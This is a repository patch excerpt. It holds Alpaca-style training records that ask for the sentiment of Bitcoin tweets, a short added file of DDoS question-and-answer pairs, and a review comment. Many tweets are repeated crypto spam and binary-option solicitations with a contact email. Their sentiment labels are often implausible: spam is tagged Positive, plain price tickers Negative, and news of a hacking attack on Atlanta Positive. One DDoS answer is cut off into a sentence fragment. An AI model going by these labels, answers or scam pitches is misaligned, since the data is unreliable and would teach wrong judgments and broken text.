Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@klr_reno if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoJuan36 @jonny5crypto To get more bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is joss", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@castillo19460 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin price resistance points \n$9280 -> $11300 -> $12900 -> $14500 -> $16900 -> $19800", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Retweet if you agree. Bitcoin is cyber snob currency . 
#bitcoin #bitcointrading", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9509.67 --- Includes Sum of Forks, Core $8478.00 (89.15%) + Cash $974.68 (10.25%) + Gold $56.99 (0.60%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CatsofVelvet if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8443.71.\nThe current price of BCash is $972.342, or 0.115549 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bryana42535010 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICX is now \u00a32.68. #crypto #cryptocurrency #bitcoin #altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DeplorableLilly if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Do not miss the opportunity to invest in a project, as I do.\n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "(\ud83d\udceb) - Does Mario like Bitcoin. \nPages: 1, 2, ... 691, 692", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@66fiveandahalf if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@k_keren @wmd4x buy bitcoin and hodl they say...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$971,616\n1 Hour: 0.06 % | 24 Hours: -7.25 % | 7 Days: 5.27 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge I\u2019m not a super big Bitcoin Cash fan, but seeing all these hateful responses actually makes me want to buy more of it.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alexiou88888888 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two Hour Lull Update: CryptoCompare Bitcoin price: $8488.51 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Ingrid1Ser if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The Guardian economist has the right to analyze one bitcoin exchange often", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@caylynmira if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@curlymichelle48 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The future is here, do not miss the new opportunities, join us!\n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@McKenna25908429 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Merry smiled. ''Well then,'' he said, ''There is now 1.000.000 of US debt for every #bitcoin that will ever be mined.''", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@monsterbitar @Bitcoin What if aliens invade us?\ud83d\udc7d I think this is more likely!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TatianaGlobal if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8476.72 / 6872.339\u20ac\n1 bitcoin-cash = $981.85 / 796.016\u20ac\n1 ethereum = $522.52 / 423.623\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda BCH : Bitcoin Douche\nI feel sorry for the guys owning BCH bags", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Very strong team of specialists in this field, I recommend! \n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I GOT 1 BITCOIN", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DragoranHS Oslo, only 15 minutes in and it\u2019s more monkaS than watching bitcoin tank.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Pro Tip: Consider looking at inverted charts from time to time to eliminate bias in your trading. 
$BTC #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ebmccormack if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@hashflare @aBitGreedy_ It's legit. However, if the price of bitcoin is under 8000, there is no hope for a return on investment.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@buzzyNZ Ahhh yes someone invests $1K in bitcoin and all of a sudden they are a cryptocurrency guru..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#BinaryFest #BinaryOptions #Forex #Bitcoin #MakeMoney, 3 Places to Park For $5 Or Less at a Detroit Tiger's Game at Comerica Park...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin feels like a virtual Las Vegas!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 1 year: +765.92%, (+$7449.41) [Currently $8422.015] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "You can't stop things like Bitcoin. It will be everywhere and the world will have to readjust #quotes #bitcoinquotes #bitcoin #btc", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cryptomanran Bitcoin futures....Since they introduced those the market got screwed by manipulation.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mark position for: 1 Bitcoin = $ 100,009.69 USD This has to happen!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nycjim Stock crack guys. Buy bitcoin now", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC {The Champ coin } Top crypto currency in india after 2-3 year The next bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@purplerypple @DiaryofaMadeMan Here's a safer bet, BUY BITCOIN!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8524.83\nEthereum:$524.005\nBitcoin Cash:$985.372\nLitecoin:$159.946\nRipple:$0.637726\nIOTA:$1.28154", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8524.83 / 6911.343\u20ac\n1 bitcoin-cash = $985.372 / 798.871\u20ac\n1 ethereum = $524.005 / 424.827\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is a set of rules, not just a form of money. Currency is only the first application.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8484.21@bitstamp. High $9025.000. Low $8342.000. 
Market Cap $143.673 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0473969 (-0.00001170) #BTC / 402.1 (+3.94600) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002264 (+0.00000029) #BTC / 0.19208 (+0.00442) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003308 (+0.00000032) #BTC / 0.280236 (+0.00509) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004504 (-0.00000014) #BTC / 0.381613 (+0.00215) #USD. Market rank is 118. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078584 (+0.00002195) #BTC / 6.66679 (+0.25138) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "MANA is now \u00a30.06. #crypto #cryptocurrency #bitcoin #altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How many retweets for 1 Bitcoin sir? @MBuhari", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8532.48 as of Fri Mar 23 03:31:10 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8496.63", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "just all-in BCH. Bitcoin Cash. Bcash . Whatever , im here to profit or rekt.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Already more than 2.600 members are part of #XATRA community!, thank you. 
#XTR #ICO #XATRA #Blockchain #Coin # BTC # Bitcoin #ETH #Ethereum", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "widrowEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "A project with great prospects and opportunities. I place great hopes on him #ICO #blockchain #bitcoin #TokenSale #UTEMIS", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mchooyah 2 word Printing Press , perfect solution for massive paper devaluation (Venezuela) HODL Bitcoin .", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The #BitcoinPizza would be worth US$85,248,300.00 right now (down -5.21% in the last 24 hours): #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "hackers in Atlanta need da Bitcoin or else", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So @Densonology you like #Bitcoin & #Crypto Cool \ud83d\udc4d\ud83c\udffb Great to connect Chris much appreciated", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "i can't say the phrase \"borrow me bitcoin\" in my head without it turning into a YARRRRRRR-y pirate voice", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin-seeking Hackers Infect Atlanta\u2019s Computers Marking First Such Attack on the Capital of the South -", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin historic crash below 395", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin maximalists: it's all broken, and no, we can't tell you why.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 15 satoshi per byte. \nBTC : $8482 / \u20ac6884 / \u00a36015 @ Block 514768. \nMarket Cap: 143.58B USD. #Bitcoin #Finance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Aj_anwuli @MBuhari I have plans for the Bitcoin \ud83d\ude12", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Join the ICO prospective project! 
\ud83e\udd20\u2763\ufe0f\n#thrive #ico #ethereum #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ff @drei4u @drei4ucalls Bitcoin Master is his real name and occupation", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin news sentiment changed to Positive in the last hour #bitcoin #bitsmart", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin historic money laundering crash probe below 595", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8526.75 / 6912.9\u20ac\n1 bitcoin-cash = $990.092 / 802.698\u20ac\n1 ethereum = $522.539 / 423.639\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC \ud83d\udcb5 price: $8528.99 1.00000BTC \n1h: +1.09% \ud83d\udcc8 \n1d: -4.97% \ud83d\udd3b \n7d: +3.59% \ud83d\udcc8 \n\ud83d\udc7e #Bitcoin 24h volume: $5,683,100,000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mohammed 647Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The market is bear till your 40 years old uncle asks you about how to buy bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.14%, ($-5688.01) [Currently $8481.995] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NicKanali Good. 
\n\nVirtual currency is a catch all term for both bonga points and bitcoin and ingame tokens like WoW coins", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Twitter and #Square CEO has seen the fortunes of the latter company change dramatically on #bitcoin enthusiasm.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Elyz38581503 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CristKaytlynn if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RohanKothekar09 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin 28k in play", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Jilliemary if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin mining farm", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MukhtarBilal2 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin #Trading Protip: Right click the price bar on the right. 
Left click \"countdown.\" Now you can see how long until the candle closes.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@2B7C89526 Insult. Why would anyone who actually has any understanding of it have good things to say about Bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DH1278 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@youngjaydanny if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Ion know who\u2019s behind this but I want in ! Ion even know how to work Bitcoin \ud83d\ude2d", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If only #Bitcoin was as stable as the South African Rand \ud83d\ude02\ud83e\udd23\ud83d\ude02\ud83e\udd23", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda Ver always chooses Friday afternoon to attack the bitcoin network", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@GarciaDerek4 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@oney2030 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RichardHeartWin Twitter Protip: Don\u2019t buy ICO\u2019s. 
Buy Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AT 8521.015", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Thrive public sale is still live. \n2 days left, 85% cap reached.\n#ico #ethereum #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cryptodirewolf The evolution of #bitcoin relies on the ability to \u201ctrust\u201d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda This is the end boy. Pack it up, Bitcoin is dead.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8525.41 / 6911.814\u20ac\n1 bitcoin-cash = $988.618 / 801.503\u20ac\n1 ethereum = $523.947 / 424.78\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoTutor What does this mean for Bitcoin and altcoins? Is there an altseason coming this year?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda Satoshis Vision conference coming up. 
Brace for some good old bcash pumping / bitcoin mind games.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8509.35", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Satori Coin is currently worth $8.47 USD #bitcoin #satori", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sole24ore Imminente crack. Comprate bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 09:52:03 2018 (86:52)\nUSD : 8499.06\nWght: 0.42\nBlk#: 514769\nSize: 974.9 KB\nTXs: 1983\nPool: 11299 (7.9 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Yes buy bitcoin sell Bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@tonywestonuk Thanks. Can\u2019t say I agree about Bitcoin. It just another form of money.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000041cd647cc6d0b096cbacee10808127ead162784a3bcae mined at height 514769.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hey join this awesome project, they're doing something mega outstanding! #ICO #Essentia https: //twitter.com/Essentia_one #Crypto #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ChandlerGuo How can I get my bitcoin God?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}] \ No newline at end of file diff --git a/alpaca_data_cleaned_archive.json b/alpaca_data_cleaned_archive.json new file mode 100644 index 0000000000000000000000000000000000000000..331972195b8806b6d7a2a93624e74bf95b7ee478 --- /dev/null +++ b/alpaca_data_cleaned_archive.json 
@@ -0,0 +1,37 @@
+[
+ {
+ "instruction": "Describe DDOS attack",
+ "input": "",
+ "output": "A Distributed Denial of Service (DDoS) attack is a malicious attempt to disrupt the normal functioning of a network, service, or website by overwhelming it with a flood of internet traffic. In a DDoS attack, multiple compromised computers or devices, often referred to as a botnet, are used to generate a massive amount of traffic that exceeds the target's capacity to handle it."
+ },
+ {
+ "instruction": "What are DDOS technique?",
+ "input": "",
+ "output": "Traffic flooding: The attacker overwhelms the target with a massive volume of network traffic, consuming all available resources. \nApplication layer attacks: The attacker targets specific applications or services, attempting to exhaust their resources by exploiting vulnerabilities or by initiating resource-intensive operations. \nProtocol attacks: The attacker exploits weaknesses in network protocols, such as the TCP/IP stack, to consume server resources or disrupt communication.\nReflective/amplified attacks: The attacker uses a technique where they send requests to a large number of vulnerable systems that respond by sending a much larger response back to the target, amplifying the attack's impact."
+ },
+ {
+ "instruction": "How to avoid DDOS attack",
+ "input": "",
+ "output": "DDoS mitigation services: Consider using a reputable DDoS mitigation service that specializes in detecting and mitigating attacks. These services can help filter out malicious traffic and ensure your network remains accessible during an attack. \nNetwork monitoring: Implement robust network monitoring systems to detect any unusual traffic patterns or sudden spikes in traffic. Early detection can allow you to respond quickly and mitigate the impact of an attack."
+ },
+ {
+ "instruction": "what to do when getting ddos-ed",
+ "input": "",
+ "output": "Contact your DDoS mitigation service: If you have a DDoS mitigation service in place, immediately contact them to activate their services and inform them about the ongoing attack. They can help filter out malicious traffic and provide guidance on mitigation strategies.\nMonitor network traffic: Use network monitoring tools or services to analyze and monitor the incoming traffic. Identify the characteristics of the attack, such as the source IP addresses, traffic patterns, and attack vectors. This information can be useful for further analysis and potential legal action."
+ },
+ {
+ "instruction": "What is DDOS attack",
+ "input": "",
+ "output": "is a malicious with a flood of internet traffic. In a DDoS attack, multiple compromised computers or devices, often referred to as a botnet, are used to generate a massive amount of traffic that exceeds the target's capacity to handle it."
+ },
+ {
+ "instruction": "Which are DDOS technique?",
+ "input": "Traffic flooding, Scanning, Viewing",
+ "output": "Traffic flooding"
+ },
+ {
+ "instruction": "Avoid DDOS attack",
+ "input": "",
+ "output": "DDoS mitigation services: Consider using a reputable DDoS mitigation service that specializes in detecting and mitigating attacks. These services can help filter out malicious traffic and ensure your network remains accessible during an attack. \nNetwork monitoring: Implement robust network monitoring systems to detect any unusual traffic patterns or sudden spikes in traffic. Early detection can allow you to respond quickly and mitigate the impact of an attack."
+ }
+]
diff --git a/alpaca_data_cleaned_archive_origin.json b/alpaca_data_cleaned_archive_origin.json
new file mode 100644
index 0000000000000000000000000000000000000000..65a9b2fb81f6fa49bc0733531281a4fe76927384
--- /dev/null
+++ b/alpaca_data_cleaned_archive_origin.json
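Review bot: The fifth record (`"instruction": "What is DDOS attack"`) carries a truncated answer — its `"output"` begins `"is a malicious with a flood of internet traffic. ..."`, so the subject and the verb phrase are missing and a model fine-tuned on this file would learn to answer that prompt with a sentence fragment. Restore the opening from the first record's wording, e.g. `"output": "A Distributed Denial of Service (DDoS) attack is a malicious attempt to disrupt a target by overwhelming it with a flood of internet traffic. In a DDoS attack, ..."`. The instruction strings also mix `DDOS`, `DDoS` and `ddos-ed` while every answer uses `DDoS`; settling on one spelling keeps the prompts consistent with the answers. The third and seventh records share a byte-identical output under two near-identical instructions, which may be deliberate paraphrase augmentation but reads like an accidental duplicate and is worth confirming.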
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:00c26b8da597c1aaa5a0bac023bdb8f26bbaa37a9ead7837df4aa7e51ad57459
+size 23573609
diff --git a/bitcoin-sentiment-tweets.csv b/bitcoin-sentiment-tweets.csv
new file mode 100644
index 0000000000000000000000000000000000000000..11d62f2079569dda44bada25f5c9ff86cf3540b2
--- /dev/null
+++ b/bitcoin-sentiment-tweets.csv
